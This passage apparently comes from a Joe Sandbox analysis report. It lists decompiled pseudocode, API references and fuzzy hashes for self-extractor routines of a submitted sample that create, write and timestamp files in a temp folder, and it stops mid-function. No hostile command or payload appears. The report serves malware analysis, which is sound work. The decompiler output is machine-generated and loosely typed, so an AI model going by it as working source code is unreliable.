                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324e33
                                                                                                                                                                                                                                            0x00324e38
                                                                                                                                                                                                                                            0x00324e3a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324e40
                                                                                                                                                                                                                                            0x00324e51
                                                                                                                                                                                                                                            0x00324e56
                                                                                                                                                                                                                                            0x00324e5b
                                                                                                                                                                                                                                            0x00324e5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324e6a
                                                                                                                                                                                                                                            0x00324e6f
                                                                                                                                                                                                                                            0x00324e71
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324e77
                                                                                                                                                                                                                                            0x00324e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324e7d
                                                                                                                                                                                                                                            0x00324d25
                                                                                                                                                                                                                                            0x00324d25
                                                                                                                                                                                                                                            0x00324d28
                                                                                                                                                                                                                                            0x00324d36
                                                                                                                                                                                                                                            0x00324d3b
                                                                                                                                                                                                                                            0x00324d40
                                                                                                                                                                                                                                            0x00324d40
                                                                                                                                                                                                                                            0x00324d42
                                                                                                                                                                                                                                            0x00324d43
                                                                                                                                                                                                                                            0x00324d43
                                                                                                                                                                                                                                            0x00324d47
                                                                                                                                                                                                                                            0x00324d4a
                                                                                                                                                                                                                                            0x00324d4a
                                                                                                                                                                                                                                            0x00324d4c
                                                                                                                                                                                                                                            0x00324d4f
                                                                                                                                                                                                                                            0x00324d4f
                                                                                                                                                                                                                                            0x00324d51
                                                                                                                                                                                                                                            0x00324d52
                                                                                                                                                                                                                                            0x00324d52
                                                                                                                                                                                                                                            0x00324d56
                                                                                                                                                                                                                                            0x00324d5b
                                                                                                                                                                                                                                            0x00324d5d
                                                                                                                                                                                                                                            0x00324d62
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324d67
                                                                                                                                                                                                                                            0x00324d6f
                                                                                                                                                                                                                                            0x00324d74
                                                                                                                                                                                                                                            0x00324d76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324d7c
                                                                                                                                                                                                                                            0x00324d84
                                                                                                                                                                                                                                            0x00324d89
                                                                                                                                                                                                                                            0x00324d8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324d94
                                                                                                                                                                                                                                            0x00324d99
                                                                                                                                                                                                                                            0x00324d9e
                                                                                                                                                                                                                                            0x00324da1
                                                                                                                                                                                                                                            0x00324daa
                                                                                                                                                                                                                                            0x00324daa
                                                                                                                                                                                                                                            0x00324da3
                                                                                                                                                                                                                                            0x00324da3
                                                                                                                                                                                                                                            0x00324da3
                                                                                                                                                                                                                                            0x00324db5
                                                                                                                                                                                                                                            0x00324dbb
                                                                                                                                                                                                                                            0x00324dbd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324dc3
                                                                                                                                                                                                                                            0x00324dc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324dc5
                                                                                                                                                                                                                                            0x00324dbd
                                                                                                                                                                                                                                            0x00324d2a
                                                                                                                                                                                                                                            0x00324d2a
                                                                                                                                                                                                                                            0x00324d2d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324d2d
                                                                                                                                                                                                                                            0x00324cf8
                                                                                                                                                                                                                                            0x00324cfd
                                                                                                                                                                                                                                            0x00324d02
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00324DB5
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00324DDD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFileItemText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                            • API String ID: 3625706803-1116576409
                                                                                                                                                                                                                                            • Opcode ID: 1ab396851e1e3560226d777fc9a50dcd5eab203f0bb14f7a8755e8e5acb8efde
                                                                                                                                                                                                                                            • Instruction ID: c1a18a4a55ca088edb636ebf2a0811ccb27cb3292741f6506c705ab9ad457d1a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ab396851e1e3560226d777fc9a50dcd5eab203f0bb14f7a8755e8e5acb8efde
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E4146362041219BCB339F38FC446B573A9EB45300F058669D8969B692DB71DE46CB90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00324C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                            				struct _FILETIME _v12;
                                                                                                                                                                                                                                            				struct _FILETIME _v20;
                                                                                                                                                                                                                                            				FILETIME* _t14;
                                                                                                                                                                                                                                            				int _t15;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t21 + 0x328d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t14 =  &_v12;
                                                                                                                                                                                                                                            					_t15 = SetFileTime( *(_t21 + 0x328d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x00324c40
                                                                                                                                                                                                                                            0x00324c4a
                                                                                                                                                                                                                                            0x00324c8d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324c70
                                                                                                                                                                                                                                            0x00324c70
                                                                                                                                                                                                                                            0x00324c7e
                                                                                                                                                                                                                                            0x00324c86
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324c8a

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DosDateTimeToFileTime.KERNEL32 ref: 00324C54
                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00324C66
                                                                                                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00324C7E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2071732420-0
                                                                                                                                                                                                                                            • Opcode ID: d1d205e875b71bd0cb99a86578e97ee5da467a87397c957e081c2c8ff8a06095
                                                                                                                                                                                                                                            • Instruction ID: 491decde149513acd0a28c9048b501a6bedd00ca6134f0a0221d8f592194dee3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1d205e875b71bd0cb99a86578e97ee5da467a87397c957e081c2c8ff8a06095
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6F0907260122CBF9B27DFB9EC49DBB77ACEF04350B44452AF816C1050EA30E915D7A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E0032487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t11 = __ecx;
                                                                                                                                                                                                                                            				asm("sbb edi, edi");
                                                                                                                                                                                                                                            				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                            				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                            					asm("sbb esi, esi");
                                                                                                                                                                                                                                            					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                            						asm("sbb esi, esi");
                                                                                                                                                                                                                                            						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t23 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                            				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                            					return _t7;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E0032490C(_t11);
                                                                                                                                                                                                                                            					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x00324880
                                                                                                                                                                                                                                            0x0032488c
                                                                                                                                                                                                                                            0x00324894
                                                                                                                                                                                                                                            0x003248a0
                                                                                                                                                                                                                                            0x003248c9
                                                                                                                                                                                                                                            0x003248ce
                                                                                                                                                                                                                                            0x003248a2
                                                                                                                                                                                                                                            0x003248a8
                                                                                                                                                                                                                                            0x003248b7
                                                                                                                                                                                                                                            0x003248bc
                                                                                                                                                                                                                                            0x003248aa
                                                                                                                                                                                                                                            0x003248ac
                                                                                                                                                                                                                                            0x003248ac
                                                                                                                                                                                                                                            0x003248a8
                                                                                                                                                                                                                                            0x003248de
                                                                                                                                                                                                                                            0x003248e7
                                                                                                                                                                                                                                            0x0032490b
                                                                                                                                                                                                                                            0x003248ee
                                                                                                                                                                                                                                            0x003248f0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324902

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00324A23,?,00324F67,*MEMCAB,00008000,00000180), ref: 003248DE
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00324F67,*MEMCAB,00008000,00000180), ref: 00324902
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                            • Opcode ID: 183792accb927ea73db27dba3a630543c4d27d089e165008cf1687f86712c25c
                                                                                                                                                                                                                                            • Instruction ID: c0c6e77c7911046101036b0205da385850ddc10d5a05dacff458bde6e12f4d38
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 183792accb927ea73db27dba3a630543c4d27d089e165008cf1687f86712c25c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6014BB3E2157026F3264129AC88FB7551CCB9A734F1B1334BDAAE71D1D6655C0481E0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00324AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				int _t12;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                                                                                            				signed int _t24;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 =  *0x32858c; // 0x270
                                                                                                                                                                                                                                            				_t9 = E00323680(_t20);
                                                                                                                                                                                                                                            				if( *0x3291d8 == 0) {
                                                                                                                                                                                                                                            					_push(_t24);
                                                                                                                                                                                                                                            					_t12 = WriteFile( *(0x328d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t25 = _a12;
                                                                                                                                                                                                                                            						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            							_t14 =  *0x329400; // 0x89c00
                                                                                                                                                                                                                                            							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                            							 *0x329400 = _t15;
                                                                                                                                                                                                                                            							if( *0x328184 != 0) {
                                                                                                                                                                                                                                            								_t21 =  *0x328584; // 0x0
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x3293f8, 0);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00324ad5
                                                                                                                                                                                                                                            0x00324adb
                                                                                                                                                                                                                                            0x00324ae7
                                                                                                                                                                                                                                            0x00324aee
                                                                                                                                                                                                                                            0x00324b05
                                                                                                                                                                                                                                            0x00324b0d
                                                                                                                                                                                                                                            0x00324b14
                                                                                                                                                                                                                                            0x00324b1a
                                                                                                                                                                                                                                            0x00324b1c
                                                                                                                                                                                                                                            0x00324b21
                                                                                                                                                                                                                                            0x00324b2a
                                                                                                                                                                                                                                            0x00324b2f
                                                                                                                                                                                                                                            0x00324b31
                                                                                                                                                                                                                                            0x00324b39
                                                                                                                                                                                                                                            0x00324b54
                                                                                                                                                                                                                                            0x00324b54
                                                                                                                                                                                                                                            0x00324b39
                                                                                                                                                                                                                                            0x00324b2f
                                                                                                                                                                                                                                            0x00324b0f
                                                                                                                                                                                                                                            0x00324b0f
                                                                                                                                                                                                                                            0x00324b0f
                                                                                                                                                                                                                                            0x00324b5e
                                                                                                                                                                                                                                            0x00324ae9
                                                                                                                                                                                                                                            0x00324aed
                                                                                                                                                                                                                                            0x00324aed

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00323680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0032369F
                                                                                                                                                                                                                                              • Part of subcall function 00323680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003236B2
                                                                                                                                                                                                                                              • Part of subcall function 00323680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003236DA
                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00324B05
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084409-0
                                                                                                                                                                                                                                            • Opcode ID: d198bc1bfcbf76996e94e8d607b7c48e69d72eb8a9eccfeb012f5cb38619cc6e
                                                                                                                                                                                                                                            • Instruction ID: 83078d9a2cb9835cddd97479e8b5570e667e45834ff48906b95f08917238d3c8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d198bc1bfcbf76996e94e8d607b7c48e69d72eb8a9eccfeb012f5cb38619cc6e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D601CC31200214ABDB268F29FC05BA2775DEB44725F15822AF9399B1E0CB30E816CB80
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E0032658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				intOrPtr _t4;
                                                                                                                                                                                                                                            				char* _t6;
                                                                                                                                                                                                                                            				char* _t8;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				char* _t16;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				char* _t19;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = __ecx;
                                                                                                                                                                                                                                            				_t10 = __edx;
                                                                                                                                                                                                                                            				_t17 = __ecx;
                                                                                                                                                                                                                                            				_t1 = _t17 + 1; // 0x328b3f
                                                                                                                                                                                                                                            				_t12 = _t1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t4 =  *_t17;
                                                                                                                                                                                                                                            					_t17 = _t17 + 1;
                                                                                                                                                                                                                                            				} while (_t4 != 0);
                                                                                                                                                                                                                                            				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                            				_t2 = _t18 + 1; // 0x328b40
                                                                                                                                                                                                                                            				if(_t2 < __edx) {
                                                                                                                                                                                                                                            					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                            					if(_t19 > __ecx) {
                                                                                                                                                                                                                                            						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                            						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                            							 *_t19 = 0x5c;
                                                                                                                                                                                                                                            							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t6 = _a4;
                                                                                                                                                                                                                                            					 *_t19 = 0;
                                                                                                                                                                                                                                            					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                            						_t6 = _t6 + 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return E003216B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0x8007007a;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x00326592
                                                                                                                                                                                                                                            0x00326594
                                                                                                                                                                                                                                            0x00326596
                                                                                                                                                                                                                                            0x00326598
                                                                                                                                                                                                                                            0x00326598
                                                                                                                                                                                                                                            0x0032659b
                                                                                                                                                                                                                                            0x0032659b
                                                                                                                                                                                                                                            0x0032659d
                                                                                                                                                                                                                                            0x0032659e
                                                                                                                                                                                                                                            0x003265a2
                                                                                                                                                                                                                                            0x003265a4
                                                                                                                                                                                                                                            0x003265a9
                                                                                                                                                                                                                                            0x003265b2
                                                                                                                                                                                                                                            0x003265b6
                                                                                                                                                                                                                                            0x003265ba
                                                                                                                                                                                                                                            0x003265c3
                                                                                                                                                                                                                                            0x003265c5
                                                                                                                                                                                                                                            0x003265c8
                                                                                                                                                                                                                                            0x003265c8
                                                                                                                                                                                                                                            0x003265c3
                                                                                                                                                                                                                                            0x003265c9
                                                                                                                                                                                                                                            0x003265cc
                                                                                                                                                                                                                                            0x003265d2
                                                                                                                                                                                                                                            0x003265d1
                                                                                                                                                                                                                                            0x003265d1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003265dc
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(00328B3E,00328B3F,00000001,00328B3E,-00000003,?,003260EC,00321140,?), ref: 003265BA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharPrev
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 122130370-0
                                                                                                                                                                                                                                            • Opcode ID: 35b65fda8d7a9ee8757a5f4f25833e44aa118338c48c3b6dd0fde8444713fa4f
                                                                                                                                                                                                                                            • Instruction ID: e7d2d2f0468cf17ad35f5b68d727447af6de389c3967c7e90ee29212de486365
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35b65fda8d7a9ee8757a5f4f25833e44aa118338c48c3b6dd0fde8444713fa4f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4F04C321042709BD333091DB885B6BBFDE9F8B350F39016EE8DAC3209CA659C4683E4
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E0032621E() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					0x4f0 = 2;
                                                                                                                                                                                                                                            					_t9 = E0032597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E003244B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					 *0x329124 = E00326285();
                                                                                                                                                                                                                                            					_t9 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00326229
                                                                                                                                                                                                                                            0x00326230
                                                                                                                                                                                                                                            0x00326247
                                                                                                                                                                                                                                            0x0032626a
                                                                                                                                                                                                                                            0x00326272
                                                                                                                                                                                                                                            0x00326249
                                                                                                                                                                                                                                            0x00326255
                                                                                                                                                                                                                                            0x0032625f
                                                                                                                                                                                                                                            0x00326264
                                                                                                                                                                                                                                            0x00326264
                                                                                                                                                                                                                                            0x00326284

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0032623F
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                              • Part of subcall function 00326285: GetLastError.KERNEL32(00325BBC), ref: 00326285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 381621628-0
                                                                                                                                                                                                                                            • Opcode ID: 5c9cf55b7ee0797b7593eb3c837db4df4b7ec055027ef77cb0f38e3aadeddfff
                                                                                                                                                                                                                                            • Instruction ID: e290b37e8b0bfb02869d20791ac5bc5fbbf78e72a146352d5afc3d728408d21c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c9cf55b7ee0797b7593eb3c837db4df4b7ec055027ef77cb0f38e3aadeddfff
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14F0E9B0704318ABD762FB74AD03FBE33BCDF44700F40446AB985DA081DD749D458650
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00324B60(signed int _a4) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            
